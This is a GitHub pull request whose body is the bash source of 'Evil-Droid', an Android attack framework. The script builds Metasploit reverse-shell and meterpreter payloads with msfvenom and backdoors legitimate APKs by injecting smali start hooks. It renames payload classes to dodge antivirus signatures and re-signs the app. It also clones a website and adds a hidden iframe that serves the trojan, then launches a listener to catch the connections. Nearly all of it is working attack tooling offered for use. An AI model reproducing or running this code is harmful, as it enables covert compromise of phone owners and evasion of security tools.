Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

999 #48

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

999 #48

wants to merge 1 commit into from

Conversation

vin999999999
Copy link

#!/usr/bin/env bash

Evil-Droid Framework . version 0.3

Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platform

Created By Mascerano Bachir .

Website: http://www.dev-labs.co

YTB : https://www.youtube.com/c/mascerano%20bachir

FCB : https://www.facebook.com/kali.linux.pentesting.tutorials

#Speciak thanks to : MrPedroubuntu , Kader Achraf , youcef yahia and Mohammed Yacine

this is an open source tool if you want to modify or add something . Please give me a copy.

resize terminal window

resize -s 40 70 > /dev/null
#Colors
cyan='\e[0;36m'
lightcyan='\e[96m'
green='\e[0;32m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
Escape="\033";
white="${Escape}[0m";
RedF="${Escape}[31m";
GreenF="${Escape}[32m";
LighGreenF="${Escape}[92m"
YellowF="${Escape}[33m";
BlueF="${Escape}[34m";
CyanF="${Escape}[36m";
Reset="${Escape}[0m";

Check root

[[ id -u -eq 0 ]] > /dev/null 2>&1 || { echo $red "You must be root to run the script"; echo ; exit 1; }
clear

check internet

function checkinternet()
{
ping -c 1 baidu.com > /dev/null 2>&1
if [[ "$?" != 0 ]]
then
echo -e $yellow " Checking For Internet: ${RedF}SUCSESS"
echo
echo -e $red "This Script Needs An Active Internet Connection"
echo
echo -e $red " Enter Evil-Droid "
echo && sleep 2
exit
else
echo -e $yellow " Checking For Internet: ${LighGreenF}CONNECTED"
fi
}
checkinternet
sleep 2
#Define options
path=pwd
lanip=hostname -I
publicip=dig +short myip.opendns.com @resolver1.opendns.com
ver="v0.3"
APKTOOL="$path/tools/apktool.jar"
VAR1=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR2=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # smali dir renaming
VAR3=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Payload.smali renaming
VAR4=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 1
VAR5=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 2
VAR6=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # Pakage name renaming 3
VAR7=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'payload'
VAR8=$(cat /dev/urandom | tr -cd 'a-z' | head -c 10) # New name for word 'metasploit'
perms=' \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n '
echo ""
sleep 1

spinner for Metasploit Generator

spinlong ()
{
bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
barlength=${#bar}
i=0
while ((i < 100)); do
n=$((i*barlength / 100))
printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.02
done
}

detect ctrl+c exiting

trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"[] (Ctrl + C ) Detected, Trying To Exit... "
echo -e $red"[
] Stopping Services... "
apache_svc_stop
postgresql_stop
sleep 1
echo ""
echo -e $yellow"[*] Thanks For Using Evil-Droid :)"
exit
}
#detect system
echo -e $blue
sudo cat /etc/issue.net
#check dependencies existence
echo -e $blue ""
echo "® Checking dependencies configuration ®"
echo " "

check if metasploit-framework is installed

which msfconsole > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Metasploit-Framework..............${LighGreenF}[ found ]"
which msfconsole > /dev/null 2>&1
sleep 2
else
echo -e $red "[ X ] Metasploit-Framework -&gt; ${RedF}not found "
echo -e $yellow "[ ! ] Installing Metasploit-Framework "
sudo apt-get install metasploit-framework -y
echo -e $blue "[ ✔ ] Done installing ...."
which msfconsole > /dev/null 2>&1
sleep 2
fi
#check if xterm is installed
which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Xterm.............................${LighGreenF}[ found ]"
which xterm > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] xterm -&gt; ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Xterm "
sleep 2
echo -e $green ""
sudo apt-get install xterm -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which xterm > /dev/null 2>&1
fi
#check if zenity is installed
which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Zenity............................${LighGreenF}[ found ]"
which zenity > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Zenity -&gt; ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Zenity "
sleep 2
echo -e $green ""
sudo apt-get install zenity -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zenity > /dev/null 2>&1
fi
#Check for Android Asset Packaging Tool
which aapt > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Aapt..............................${LighGreenF}[ found ]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Aapt -&gt; ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Aapt "
sleep 2
echo -e $green ""
sudo apt-get install aapt -y
sudo apt-get install android-framework-res -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which aapt > /dev/null 2>&1
fi
#Check for Apktool Reverse Engineering
which apktool > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Apktool...........................${LighGreenF}[ found ]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Apktool -&gt; ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Apktool "
sleep 2
echo -e $green ""
sudo apt-get install apktool -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which apktool > /dev/null 2>&1
fi
#check for zipalign
which zipalign > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e $green "[ ✔ ] Zipalign..........................${LighGreenF}[ found ]"
which aapt > /dev/null 2>&1
sleep 2
else
echo ""
echo -e $red "[ X ] Zipalign -&gt; ${RedF}not found! "
sleep 2
echo -e $yellow "[ ! ] Installing Zipalign "
sleep 2
echo -e $green ""
sudo apt-get install zipalign -y
clear
echo -e $blue "[ ✔ ] Done installing .... "
which zipalign > /dev/null 2>&1
fi
directory="$path/evilapk"
if [ ! -d "$directory" ]; then
echo "Creating the output directory..."
mkdir $directory
sleep 3
fi
echo -e $red "╔────────────────────────────────────────────────╗"
echo -e $red "| Evil-Droid Framework $ver - Dev-labs.co |"
echo -e $red "| Please do not upload APK to VirusTotal.com |"
echo -e $red "┖────────────────────────────────────────────────┙"
#function ascii banner
function print_ascii_art {
echo -e $lightgreen " . . "
echo -e $lightgreen " M. .M "
echo -e $lightgreen " MMMMMMMMMMM. "
echo -e $lightgreen " .MMM\MMMMMMM/MMM. "
echo -e $lightgreen " .MMM.7MMMMMMM.7MMM. "
echo -e $lightgreen " .MMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMMMM.......MMMMMMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMM MMMMMMMMMMMMMMMMMMMMM MMMM "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " dMMMM.MMMMMMMMMMMMMMMMMMMMM.MMMMD "
echo -e $lightgreen " MMM8 MMMMMMMMMMMMMMMMMMMMM 8MMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMMMMMMMMMMMMMMMMMM "
echo -e $lightgreen " MMMMM MMMMM $ver "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " MMMMM MMMMM "
echo -e $lightgreen " .MMM. .MMM. "
echo -e $lightgreen " Mascerano Bachir - Dev-labs "
}
#function lhost
function get_lhost()
{
LHOST=$(zenity --title="☢ SET LHOST ☢" --text "Your-Local-ip: $lanip ; Your-Public-ip: $publicip" --entry-text "$lanip" --entry --width 300 2> /dev/null)
}
#function lport
function get_lport()
{
LPORT=$(zenity --title="☢ SET LPORT ☢" --text "example: 4444" --entry-text "4444" --entry --width 300 2> /dev/null)
}
#function payload
function get_payload()
{
PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter_reverse_tcp" FALSE "android/meterpreter_reverse_http" FALSE "android/meterpreter_reverse_https" --width 400 --height 400 2> /dev/null)
}
function get_payload1()
{
PAYLOAD=$(zenity --list --title "☢ EVIL-DROID ☢" --text "\nChose payload option:" --radiolist --column "Choose" --column "Option" TRUE "android/shell/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" --width 400 --height 400 2> /dev/null)
}
#function name
function payload_name()
{
apk_name=$(zenity --title "☢ PAYLOAD NAME ☢" --text "example: evilapk" --entry --entry-text "evilapk" --width 300 2> /dev/null)
}
#function original apk
function orig_apk()
{
orig=$(zenity --title "☢ ORIGINAL APK ☢" --filename=$path --file-selection --file-filter ".apk" --text "chose the original (apk)" 2> /dev/null)
}
#function change icon
function change_icon()
{
iconos=$(zenity --title "☢ CHOOSE ICON ☢" --filename=$path --file-selection --file-filter "
.png" --text "chose your own icon." 2> /dev/null)
}
#function generate payload
function gen_payload()
{
echo -e $yellow ""
echo "[] Generating apk payload"
spinlong
xterm -T " GENERATE APK PAYLOAD" -e msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
function embed_payload()
{
echo -e $yellow ""
echo "[
] Embeding apk payload in orginal apk"
spinlong
xterm -T " EMBED APK PAYLOAD" -e msfvenom -x $orig -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -a dalvik --platform android R -o $apk_name.apk > /dev/null 2>&1
}
#function update apktool
function up_apktook()
{
echo -e $yellow ""
echo "[] Removing 1.apk framework file..."
spinlong
apktool empty-framework-dir --force > /dev/null 2>&1
}
#function apktool
function apk_decomp()
{
echo -e $yellow ""
echo "[
] Decompiling Payload APK..."
spinlong
xterm -T "Decompiling Payload" -e java -jar $APKTOOL d -f -o $path/payload $path/$apk_name.apk > /dev/null 2>&1
rm $apk_name.apk
}
function apk_comp()
{
echo -e $yellow ""
echo "[] Rebuilding APK file..."
spinlong
xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/payload -o evil.apk > /dev/null 2>&1
rm -r payload > /dev/null 2>&1
}
function apk_decomp1()
{
echo -e $yellow ""
echo "[
] Decompiling Original APK..."
spinlong
xterm -T "Decompiling Original" -e java -jar $APKTOOL d -f -o $path/original $orig > /dev/null 2>&1
}
function apk_comp1()
{
echo -e $yellow ""
echo "[*] Rebuilding Backdoored APK..."
spinlong
xterm -T "Rebuilding APK" -e java -jar $APKTOOL b $path/original -o evil.apk > /dev/null 2>&1
rm -r payload > /dev/null 2>&1
rm -r original > /dev/null 2>&1
}
#function errors
function error()
{
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "【X】 Failed to rebuild backdoored apk【X】"
echo
apache_svc_stop
postgresql_stop
exit $rc
fi
}
function error0()
{
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "【X】 An Error Was Occured .Ty Again【X】"
echo
apache_svc_stop
postgresql_stop
exit $rc
fi
}
#function apache2 service
function apache_svc_start()
{
service apache2 start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function apache_svc_stop()
{
service apache2 stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop apache2 service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
#function postgresql service
function postgresql_start()
{
service postgresql start | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Start postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}
function postgresql_stop()
{
service postgresql stop | zenity --progress --pulsate --title "PLEASE WAIT..." --text="Stop postgresql service" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
}

function adding permission

function perms()
{
echo -e $yellow ""
echo "[] Adding permission and Hook Smali"
spinlong
package_name=head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g' 2>&1
package_dash=head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g' 2>&1
tmp=$package_name
sed -i "5i\ $perms" $path/original/AndroidManifest.xml
rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
sed -i "s|Lcom/metasploit|L$package_name|g" $path/payload/smali/com/metasploit/stage/
.smali 2>&1
cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$package_name > /dev/null 2>&1
rc=$?
if [ $rc != 0 ];then
app_name=grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%' 2>&1
app_dash=grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%' 2>&1
tmp=$app_name
sed -i "s|L$package_name|L$app_name|g" $path/payload/smali/com/metasploit/stage/*.smali 2>&1
cp -r $path/payload/smali/com/metasploit/stage $path/original/smali/$app_name > /dev/null 2>&1
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
fi
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
android_nam=$tmp
}

functions hook smali

function hook_smalies()
{
launcher_line_num=grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }' 2>&1
android_name=grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g' 2>&1
android_activity=grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g' 2>&1
android_targetActivity=grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g' 2>&1
if [ $android_name ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
hook_num=grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }' 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
elif [ ! -e $android_activity ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
hook_num=grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }' 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
spinlong
echo -e $red ""
echo "[x] cant find : $android_activity.smali"
echo "[] try another ..."
spinlong
sleep 2
echo
echo "##################################################################"
echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
hook_num=grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }' 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/stage/MainService;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
fi
fi
}
#function flagged by av & updating smalies
function flagg()
{
echo -e $yellow ""
echo "[
] Scrubbing the payload contents to avoid AV signatures..."
spinlong
mv payload/smali/com/metasploit payload/smali/com/$VAR1
mv payload/smali/com/$VAR1/stage payload/smali/com/$VAR1/$VAR2
mv payload/smali/com/$VAR1/$VAR2/Payload.smali payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sleep 2
if [ -f payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then
echo
echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
apache_svc_stop
postgresql_stop
exit 1
fi
sed -i "s#/metasploit/stage#/$VAR1/$VAR2#g" payload/smali/com/$VAR1/$VAR2/*
sed -i "s#Payload#$VAR3#g" payload/smali/com/$VAR1/$VAR2/*
sed -i "s#com.metasploit.meterpreter.AndroidMeterpreter#com.$VAR4.$VAR5.$VAR6#" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sed -i "s#payload#$VAR7#g" payload/smali/com/$VAR1/$VAR2/$VAR3.smali
sed -i "s#com.metasploit.stage#com.$VAR1.$VAR2#" payload/AndroidManifest.xml
sed -i "s#metasploit#$VAR8#" payload/AndroidManifest.xml
sed -i "s#MainActivity#$apk_name#" payload/res/values/strings.xml
sed -i '/.SET_WALLPAPER/d' payload/AndroidManifest.xml
sed -i '/WRITE_SMS/a' payload/AndroidManifest.xml
}
function flagg_original()
{
echo -e $yellow ""
echo "[] Scrubbing the payload contents to avoid AV signatures..."
spinlong
rm $path/payload/smali/com/metasploit/stage/MainActivity.smali 2>&1
mv payload/smali/com/metasploit/stage payload/smali/com/metasploit/$VAR1
mv payload/smali/com/metasploit/$VAR1/MainBroadcastReceiver.smali payload/smali/com/metasploit/$VAR1/$VAR2.smali
mv payload/smali/com/metasploit/$VAR1/MainService.smali payload/smali/com/metasploit/$VAR1/$VAR3.smali
mv payload/smali/com/metasploit/$VAR1/Payload.smali payload/smali/com/metasploit/$VAR1/$VAR4.smali
sleep 2
if [ -f payload/smali/com/metasploit/$VAR1/PayloadTrustManager.smali ]; then
echo
echo -e $red "[ X ] an error was occured . Please upgrade your distro .."
apache_svc_stop
postgresql_stop
exit 1
fi
echo -e $yellow ""
echo "[
] Adding permission and Hook Smali"
spinlong
sed -i "5i\ $perms" $path/original/AndroidManifest.xml
package_name=head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g' 2>&1
package_dash=head -n 2 $path/original/AndroidManifest.xml|grep "<manifest"|grep -o -P 'package="[^\"]+"'|sed 's/\"//g'|sed 's/package=//g'|sed 's/\./\//g'|sed 's|/|.|g' 2>&1
tmp=$package_name
sed -i "s|Lcom/metasploit/stage|L$package_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$package_name/$VAR1/Payload|L$package_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/
.smali 2>&1
sed -i "s|L$package_name/$VAR1/MainService|L$package_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$package_name/$VAR1/MainBroadcastReceiver|L$package_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/
.smali 2>&1
cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$package_name > /dev/null 2>&1
rc=$?
if [ $rc != 0 ];then
app_name=grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's%/[^/]*$%%' 2>&1
app_dash=grep "<application" $path/original/AndroidManifest.xml|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g'|sed 's|/|.|g'|sed 's%.[^.]*$%%' 2>&1
tmp=$app_name
sed -i "s|L$package_name/$VAR1|L$app_name/$VAR1|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR4|L$app_name/$VAR1/$VAR4|g" $path/payload/smali/com/metasploit/$VAR1/
.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR3|L$app_name/$VAR1/$VAR3|g" $path/payload/smali/com/metasploit/$VAR1/.smali 2>&1
sed -i "s|L$app_name/$VAR1/$VAR2|L$app_name/$VAR1/$VAR2|g" $path/payload/smali/com/metasploit/$VAR1/
.smali 2>&1
cp -r $path/payload/smali/com/metasploit/$VAR1 $path/original/smali/$app_name > /dev/null 2>&1
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
fi
amanifest=" "
boot_cmp=' \n \n \n \n '
sed -i "s|$amanifest|$boot_cmp|g" $path/original/AndroidManifest.xml 2>&1
android_nam=$tmp
launcher_line_num=grep -n "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml |awk -F ":" 'NR==1{ print $1 }' 2>&1
android_name=grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<application"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g' 2>&1
android_activity=grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|tail -1|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g' 2>&1
android_targetActivity=grep -B $launcher_line_num "android.intent.category.LAUNCHER" $path/original/AndroidManifest.xml|grep -B $launcher_line_num "android.intent.action.MAIN"|grep "<activity"|grep -m1 ""|grep -o -P 'android:name="[^\"]+"'|sed 's/\"//g'|sed 's/android:name=//g'|sed 's/\./\//g' 2>&1
if [ $android_name ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_name.smali" |awk -F ":/" '{ print $NF }'
hook_num=grep -n " return-void" $path/original/smali/$android_name.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }' 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_name.smali > /dev/null 2>&1
elif [ ! -e $android_activity ]; then
echo
echo "##################################################################"
echo "inject Smali: $android_activity.smali" |awk -F ":/" '{ print $NF }'
hook_num=grep -n " return-void" $path/original/smali/$android_activity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }' 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_activity.smali > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
spinlong
echo -e $red ""
echo "[x] cant find : $android_activity.smali"
echo "[*] try another ..."
spinlong
sleep 2
echo
echo "##################################################################"
echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
hook_num=grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }' 2>&1
echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
fi
fi
}

function chage name and icon

function merge_name_ico()
{
echo -e $yellow ""
echo "[] Changing name and icon payload..."
spinlong
label=' '
label1=' '
sed -i "s|$label|$label1|g" $path/payload/AndroidManifest.xml 2>&1
sed -i "s|MainActivity|$apk_name|g" $path/payload/res/values/strings.xml 2>&1
mkdir $path/payload/res/drawable
cp $iconos $path/payload/res/drawable/main_icon.png
}
#function signing apk
function sign()
{
echo -e $yellow ""
echo "[
] Checking for ~/.android/debug.keystore for signing..."
spinlong
if [ ! -f /.android/debug.keystore ]; then
echo -e $red ""
echo " [ X ] Debug key not found. Generating one now..."
spinlong
if [ ! -d "
/.android" ]; then
mkdir ~/.android > /dev/null 2>&1
fi
echo -e $lightgreen ""
keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000
fi
spinlong
echo -e $yellow ""
echo "[] Attempting to sign the package with your android debug key"
spinlong
jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA evil.apk androiddebugkey > /dev/null 2>&1
echo -e $yellow
echo "[
] Verifying signed artifacts..."
spinlong
jarsigner -verify -certs evil.apk > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "[!] Failed to verify signed artifacts"
apache_svc_stop
postgresql_stop
exit $rc
fi
echo -e $yellow
echo "[] Aligning recompiled APK..."
spinlong
zipalign 4 evil.apk $apk_name.apk 2>&1
rc=$?
echo -e $yellow
echo "[✔] Done."
spinlong
if [ $rc != 0 ]; then
echo -e $red ""
echo "[!] Failed to align recompiled APK"
apache_svc_stop
postgresql_stop
exit $rc
fi
rm evil.apk > /dev/null 2>&1
}
#function ask
function quests()
{
while true; do
echo ""
quest=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose payload apk or original apk?" --radiolist --column "Choose" --column "Option" TRUE "APK-MSF" FALSE "ORIGINAL-APK" --width 305 --height 270 2> /dev/null)
case $quest in
APK-MSF) change_icon;spinlong;gen_payload;spinlong;apk_decomp;flagg;merge_name_ico;spinlong;apk_comp;spinlong;sign;return;;
ORIGINAL-APK) orig_apk;spinlong;gen_payload;spinlong;up_apktook;apk_decomp1;spinlong;apk_decomp;flagg_original;spinlong;apk_comp1;spinlong;sign;return;;
esac
done
}
#function listeners
function listener()
{
xterm -T "EVIL-DROID MULTI/HANDLER" -fa monaco -fs 10 -bg black -e "msfconsole -x 'use multi/handler; set LHOST $lanip; set LPORT $LPORT; set PAYLOAD $PAYLOAD; exploit'"
}
#function clone site
function clns()
{
clone=$(zenity --title "☢ CLONE WEBSITE ☢" --text "PASTE LINK WEBSITE TO CLONE" --entry --width 400 2> /dev/null)
}
function index_name()
{
index=$(zenity --title "☢ INDEX NAME ☢" --text "example: wtf.html" --entry --entry-text "wtf" --width 300 2> /dev/null)
echo -e $yellow ""
echo "[
] Clone Website From URL..."
spinlong
wget $clone --no-check-certificate -O $index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0" > /dev/null 2>&1
}
function launcher()
{
echo '<iframe id="frame" src="evil.apk" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe><script type="text/javascript">setTimeout(function(){window.location.href="http://local-ip";}, 15000);</script>' | sed "s|evil.apk|$apk_name.apk|" | sed "s|local-ip|$LHOST/$index.html|" >> apk_index
com=cat apk_index
rep=""
sed "s|$rep|$com|" $index.html > index2.html
mv index2.html /var/www/html/$index.html > /dev/null 2>&1
cp $path/evilapk/$apk_name.apk /var/www/html > /dev/null 2>&1
rm apk_index > /dev/null 2>&1
rm $index.html > /dev/null 2>&1
zenity --title "☢ SITE CLONED ☢" --info --text "http://$LHOST/$index.html" --width 400 > /dev/null 2>&1
}
#function attack verctor
function atkv()
{
while true; do
echo ""
atk_v=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose an option bellow:" --radiolist --column "Choose" --column "Option" TRUE "Multi-Handler" FALSE "Attack-Vector" FALSE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null)
case $atk_v in
Multi-Handler) listener;suite;;
Attack-Vector) clns;spinlong;index_name;launcher;listener;suite;;
Main-Menu) clear;main;;
Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
esac
done
}
